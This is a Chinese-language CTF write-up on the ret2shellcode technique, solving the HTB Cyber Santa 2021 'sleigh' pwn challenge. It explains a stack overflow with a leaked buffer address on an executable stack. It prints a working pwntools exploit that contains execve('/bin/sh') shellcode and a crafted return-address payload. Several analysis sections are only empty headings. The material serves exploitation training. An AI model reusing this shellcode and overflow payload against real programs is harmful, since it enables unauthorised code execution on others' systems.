CTF-PWN-栈溢出-基本ROP-【ret2shellcode】

ret2shellcode

控制程序去执行我们自己填充的代码。
条件：

• 我们填充的代码的位置具有可执行权限

HTBCyberSanta 2021 sleigh

检查保护

Has RWX segments提示有可读可写可执行的段

main函数

banner函数：

repair函数：

这里read存在栈溢出，同时第一个fprintf输出了buf的地址

goodbye函数

sleigh函数

C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数（类型为 int 型）。

fprintf用法

#include <stdio.h>
#include <stdlib.h>

int main()
{
   FILE * fp;

   fp = fopen ("file.txt", "w+");
   fprintf(fp, "%s %s %s %d", "We", "are", "in", 2014);
   
   fclose(fp);
   
   return(0);
}

思路

栈溢出，同时栈上可执行，利用泄露的buf地址作为返回地址，同时将shellcode写入buf

shellcode一个不行就换下一个
shellcdoe
shellcode

接受字节‘0x ……’的处理，先化整型然后p64处理

s.recvuntil(b" [")
leakVariable = p64(int(s.recvuntil(b"]")[:-1].decode(),16))//转换到八个字节的地址形式

exp

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

s = process("./sleigh")
s.sendline(b"1")
s.recvuntil(b" [")
leakVariable = p64(int(s.recvuntil(b"]")[:-1].decode(),16))
payload = shellcode.ljust(72,b"A")
payload += leakVariable
s.sendline(payload)
s.interactive()
s.close()